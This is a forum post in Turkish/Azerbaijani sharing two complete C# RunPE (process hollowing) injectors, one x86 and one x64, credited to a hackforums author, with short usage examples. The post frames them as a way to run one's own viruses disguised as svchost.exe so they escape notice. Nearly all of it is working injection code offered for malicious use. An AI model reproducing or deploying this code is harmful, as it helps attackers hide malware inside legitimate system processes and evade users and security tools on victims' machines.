Azerbaycandan selamlar arkadaşlar!
Sizlere verdiyim bu iki kodla kendi virüslerinizi RunPE yapa bilirsiniz.
RunPE nedir?
Energizer01: herhangi tür virüsün sistem dosyası adı altında çalışmasıdır,örneğin görev yöneticisini açtığında svchost.exe yazar, sistem dosyası diye ellemezsin ,yeterli güvenlik önlemi yoksa orda gizlice çalışır, bir nevi virüsü kamuflajlama diyebiliriz...
x86 kod:
kullanım kodu:
__________________________________________________________________
x64 kodu:
kullanım için kod:
Alıntıdır! sağlıcakla kullanın. çalışıyor win 10 x86 da denedim
Sizlere verdiyim bu iki kodla kendi virüslerinizi RunPE yapa bilirsiniz.
RunPE nedir?
Energizer01: herhangi tür virüsün sistem dosyası adı altında çalışmasıdır,örneğin görev yöneticisini açtığında svchost.exe yazar, sistem dosyası diye ellemezsin ,yeterli güvenlik önlemi yoksa orda gizlice çalışır, bir nevi virüsü kamuflajlama diyebiliriz...
x86 kod:
Kod:
using System;
using System.ComponentModel;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HackForums.gigajew
{
/// <summary>
/// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
/// Please leave these credits as a reminder of all the hours of work put into this
/// </summary>
public class WinXParameters
{
public byte[] Payload;
public string HostFileName;
public string[] Arguments;
public bool Hidden;
public static WinXParameters Create(byte[] payload, string hostFileName, bool hidden, params string[] arguments)
{
WinXParameters parameters = new WinXParameters();
parameters.HostFileName = hostFileName;
parameters.Payload = payload;
parameters.Arguments = arguments;
parameters.Hidden = hidden;
return parameters;
}
public string GetFormattedHostFileName()
{
if (Arguments != null)
{
if (Arguments.Length > 0)
{
return string.Format("{0} {1}", HostFileName, string.Join(" ", Arguments));
}
}
return HostFileName;
}
}
/// <summary>
/// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
/// Please leave these credits as a reminder of all the hours of work put into this
/// </summary>
public static unsafe class WinXRunPE
{
public static bool Inject(WinXParameters parameters)
{
_IMAGE_DOS_HEADER* dosHeader;
_IMAGE_NT_HEADERS* ntHeaders;
IntPtr pImageBase;
IntPtr pBuffer;
bool emulatedi386 = false;
string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().********);
ProcessInfo processInfo;
processInfo = new ProcessInfo();
_CONTEXT context = new _CONTEXT();
context.ContextFlags = 0x10001b;
// get the address of buffer
fixed (byte* pBufferUnsafe = parameters.Payload)
{
pBuffer = (IntPtr)pBufferUnsafe;
dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
ntHeaders = (_IMAGE_NT_HEADERS*)(pBufferUnsafe + (dosHeader->e_lfanew));
}
// security checks
if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
{
throw new Win32Exception("Not a valid Win32 PE! -gigajew");
}
// check 32-bit
if (ntHeaders->OptionalHeader.Magic != 0x10b)
{
throw new Exception("This RunPE only supports i386-built executables! -gigajew");
}
// patch (by Menalix/gigajew)
Buffer.SetByte(parameters.Payload, 0x398, 0x2);
// init
if (!CreateProcess(null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, parameters.Hidden ? 0x00000004u | 0x08000000u : 0x00000004u, IntPtr.Zero, currentDir, new byte[0], &processInfo))
{
if (processInfo.hProcess != IntPtr.Zero)
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
}
}
return false;
}
// check emulated i386
IsWow64Process(processInfo.hProcess, ref emulatedi386);
// unmap
pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
// allocate
if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
// copy image headers
if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
// copy sections
for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
{
_IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
}
// get thread context
if (emulatedi386)
{
if (!Wow64GetThreadContext(processInfo.hThread, &context))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
}
else
{
if (!GetThreadContext(processInfo.hThread, &context))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
}
// patch imagebase
IntPtr address = Marshal.AllocHGlobal(8);
ulong puImageBase = (ulong)pImageBase.ToInt64();
byte[] pbImageBase = new byte[8];
pbImageBase[0] = (byte)(puImageBase >> 0);
pbImageBase[1] = (byte)(puImageBase >> 8);
pbImageBase[2] = (byte)(puImageBase >> 16);
pbImageBase[3] = (byte)(puImageBase >> 24);
pbImageBase[4] = (byte)(puImageBase >> 32);
pbImageBase[5] = (byte)(puImageBase >> 40);
pbImageBase[6] = (byte)(puImageBase >> 48);
pbImageBase[7] = (byte)(puImageBase >> 56);
Marshal.Copy(pbImageBase, 0, address, 8);
if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Ebx + 8ul), address, 4u, IntPtr.Zero))
{
Marshal.FreeHGlobal(address);
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
Marshal.FreeHGlobal(address);
// patch ep
context.Eax = (uint)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
// set context
if (emulatedi386)
{
if (!Wow64SetThreadContext(processInfo.hThread, &context))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
}
else
{
if (!SetThreadContext(processInfo.hThread, &context))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
}
// resume thread
ResumeThread(processInfo.hThread);
// cleanup
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return true;
}
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
[MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
[MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
[MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
[MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
byte[] lpStartupInfo,
ProcessInfo* lpProcessInfo);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
[DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.U4)]
private static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.SysInt)]
private static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
[MarshalAs(UnmanagedType.U4)]uint dwSize,
[MarshalAs(UnmanagedType.U4)]uint flAl********Type,
[MarshalAs(UnmanagedType.U4)]uint flProtect);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
[MarshalAs(UnmanagedType.U4)]uint nSize,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.U4)]
private static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool IsWow64Process([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)]ref bool isWow64);
}
[StructLayout(LayoutKind.Sequential)]
public struct ProcessInfo
{
public IntPtr hProcess;
public IntPtr hThread;
}
[StructLayout(LayoutKind.Explicit, Size = 0x28)]
public struct _IMAGE_SECTION_HEADER
{
[FieldOffset(0xc)]
public UInt32 VirtualAddress;
[FieldOffset(0x10)]
public UInt32 SizeOfRawData;
[FieldOffset(0x14)]
public UInt32 PointerToRawData;
}
[StructLayout(LayoutKind.Explicit, Size = 0x14)]
public struct _IMAGE_FILE_HEADER
{
[FieldOffset(0x02)]
public ushort NumberOfSections;
}
[StructLayout(LayoutKind.Explicit, Size = 0x40)]
public struct _IMAGE_DOS_HEADER
{
[FieldOffset(0x00)]
public ushort e_magic;
[FieldOffset(0x3c)]
public uint e_lfanew;
}
[StructLayout(LayoutKind.Explicit, Size = 0xf8)]
public struct _IMAGE_NT_HEADERS
{
[FieldOffset(0x00)]
public uint Signature;
[FieldOffset(0x04)]
public _IMAGE_FILE_HEADER FileHeader;
[FieldOffset(0x18)]
public _IMAGE_OPTIONAL_HEADER OptionalHeader;
}
[StructLayout(LayoutKind.Explicit, Size = 0xe0)]
public struct _IMAGE_OPTIONAL_HEADER
{
[FieldOffset(0x00)]
public ushort Magic;
[FieldOffset(0x010)]
public uint AddressOfEntryPoint;
[FieldOffset(0x1c)]
public uint ImageBase;
[FieldOffset(0x38)]
public uint SizeOfImage;
[FieldOffset(0x3c)]
public uint SizeOfHeaders;
}
[StructLayout(LayoutKind.Explicit, Size = 0x2cc)]
public struct _CONTEXT
{
[FieldOffset(0x00)]
public uint ContextFlags;
[FieldOffset(0xa4)]
public uint Ebx;
[FieldOffset(0xb0)]
public uint Eax;
}
}kullanım kodu:
Kod:
public static int Main(string[] args)
{
byte[] payload = File.ReadAllBytes("putty.exe");
string i386svchost = "C:\\Windows\\SysWow64\\svchost.exe"; //notice SysWow64 instead of System32
string[] arguments = null;
bool hidden = false;
WinXParameters parameters = WinXParameters.Create(payload, i386svchost, hidden, arguments);
bool res = WinXRunPE.Inject(parameters);
Console.WriteLine("Executed: {0}", res.ToString());
Console.ReadLine();
return 0;
}__________________________________________________________________
x64 kodu:
Kod:
using System;
using System.ComponentModel;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HackForums.gigajew
{
/// <summary>
/// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
/// Please leave these credits as a reminder of all the hours of work put into this
/// </summary>
public class WinXParameters
{
public byte[] Payload;
public string HostFileName;
public string[] Arguments;
public bool Hidden;
public static WinXParameters Create(byte[] payload, string hostFileName, bool hidden, params string[] arguments)
{
WinXParameters parameters = new WinXParameters();
parameters.HostFileName = hostFileName;
parameters.Payload = payload;
parameters.Arguments = arguments;
parameters.Hidden = hidden;
return parameters;
}
public string GetFormattedHostFileName()
{
if (Arguments != null)
{
if (Arguments.Length > 0)
{
return string.Format("{0} {1}", HostFileName, string.Join(" ", Arguments));
}
}
return HostFileName;
}
}
/// <summary>
/// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
/// Please leave these credits as a reminder of all the hours of work put into this
/// </summary>
public static unsafe class WinXRunPE_AMD64
{
public static bool Inject(WinXParameters parameters)
{
_IMAGE_DOS_HEADER* dosHeader;
_IMAGE_NT_HEADERS64* ntHeaders;
IntPtr pImageBase;
IntPtr pBuffer;
string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().********);
ProcessInfo processInfo;
processInfo = new ProcessInfo();
_CONTEXT_AMD64 context = new _CONTEXT_AMD64();
context.ContextFlags = 0x10001b;
// get the address of buffer
fixed (byte* pBufferUnsafe = parameters.Payload)
{
pBuffer = (IntPtr)pBufferUnsafe;
dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
ntHeaders = (_IMAGE_NT_HEADERS64*)(pBufferUnsafe + (dosHeader->e_lfanew));
}
// security checks
if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
{
throw new Win32Exception("Not a valid Win32 PE! -gigajew");
}
// check 32-bit
if (ntHeaders->OptionalHeader.Magic != 0x20b)
{
throw new Exception("This RunPE only supports AMD64-built executables! -gigajew");
}
// init
if (!CreateProcess(null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, parameters.Hidden ? 0x00000004u | 0x08000000u : 0x00000004u, IntPtr.Zero, currentDir, new byte[0], &processInfo))
{
if (processInfo.hProcess != IntPtr.Zero)
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
}
}
return false;
}
// unmap
pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
// allocate
if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
// copy image headers
if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
// copy sections
for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
{
_IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS64)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
}
// get thread context
if (!GetThreadContext(processInfo.hThread, &context))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
// patch imagebase
IntPtr address = Marshal.AllocHGlobal(8);
ulong puImageBase = (ulong)pImageBase.ToInt64();
byte[] pbImageBase = new byte[8];
pbImageBase[0] = (byte)(puImageBase >> 0);
pbImageBase[1] = (byte)(puImageBase >> 8);
pbImageBase[2] = (byte)(puImageBase >> 16);
pbImageBase[3] = (byte)(puImageBase >> 24);
pbImageBase[4] = (byte)(puImageBase >> 32);
pbImageBase[5] = (byte)(puImageBase >> 40);
pbImageBase[6] = (byte)(puImageBase >> 48);
pbImageBase[7] = (byte)(puImageBase >> 56);
Marshal.Copy(pbImageBase, 0, address, 8);
if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Rdx + 16ul), address, 8u, IntPtr.Zero))
{
Marshal.FreeHGlobal(address);
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
Marshal.FreeHGlobal(address);
// patch ep
context.Rcx = (ulong)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
// set context
if (!SetThreadContext(processInfo.hThread, &context))
{
if (!TerminateProcess(processInfo.hProcess, -1))
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
else
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return false;
}
}
// resume thread
ResumeThread(processInfo.hThread);
// cleanup
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
return true;
}
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
[MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
[MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
[MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
[MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
byte[] lpStartupInfo,
ProcessInfo* lpProcessInfo);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
[DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.U4)]
private static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.SysInt)]
private static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
[MarshalAs(UnmanagedType.U4)]uint dwSize,
[MarshalAs(UnmanagedType.U4)]uint flAl********Type,
[MarshalAs(UnmanagedType.U4)]uint flProtect);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
[MarshalAs(UnmanagedType.U4)]uint nSize,
[MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.U4)]
private static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
}
[StructLayout(LayoutKind.Sequential)]
public struct ProcessInfo
{
public IntPtr hProcess;
public IntPtr hThread;
}
[StructLayout(LayoutKind.Explicit, Size = 0x28)]
public struct _IMAGE_SECTION_HEADER
{
[FieldOffset(0xc)]
public UInt32 VirtualAddress;
[FieldOffset(0x10)]
public UInt32 SizeOfRawData;
[FieldOffset(0x14)]
public UInt32 PointerToRawData;
}
[StructLayout(LayoutKind.Explicit, Size = 0x14)]
public struct _IMAGE_FILE_HEADER
{
[FieldOffset(0x02)]
public ushort NumberOfSections;
}
[StructLayout(LayoutKind.Explicit, Size = 0x40)]
public struct _IMAGE_DOS_HEADER
{
[FieldOffset(0x00)]
public ushort e_magic;
[FieldOffset(0x3c)]
public uint e_lfanew;
}
[StructLayout(LayoutKind.Explicit, Size = 0x108)]
public struct _IMAGE_NT_HEADERS64
{
[FieldOffset(0x00)]
public uint Signature;
[FieldOffset(0x04)]
public _IMAGE_FILE_HEADER FileHeader;
[FieldOffset(0x18)]
public _IMAGE_OPTIONAL_HEADER64 OptionalHeader;
}
[StructLayout(LayoutKind.Explicit, Size = 0xf0)]
public struct _IMAGE_OPTIONAL_HEADER64
{
[FieldOffset(0x00)]
public ushort Magic;
[FieldOffset(0x010)]
public uint AddressOfEntryPoint;
[FieldOffset(0x18)]
public ulong ImageBase;
[FieldOffset(0x38)]
public uint SizeOfImage;
[FieldOffset(0x3c)]
public uint SizeOfHeaders;
}
[StructLayout(LayoutKind.Explicit, Size = 0x4d0)]
public struct _CONTEXT_AMD64
{
[FieldOffset(0x30)]
public uint ContextFlags;
[FieldOffset(0x80)]
public ulong Rcx;
[FieldOffset(0x88)]
public ulong Rdx;
}
}kullanım için kod:
Kod:
public static int Main(string[] args)
{
byte[] payload = File.ReadAllBytes("putty.exe");
string i386svchost = "C:\\Windows\\SysWow64\\svchost.exe"; //notice SysWow64 instead of System32
string[] arguments = null;
bool hidden = false;
WinXParameters parameters = WinXParameters.Create(payload, i386svchost, hidden, arguments);
bool res = WinXRunPE_AMD64.Inject(parameters);
Console.WriteLine("Executed: {0}", res.ToString());
Console.ReadLine();
return 0;
}Alıntıdır! sağlıcakla kullanın. çalışıyor win 10 x86 da denedim
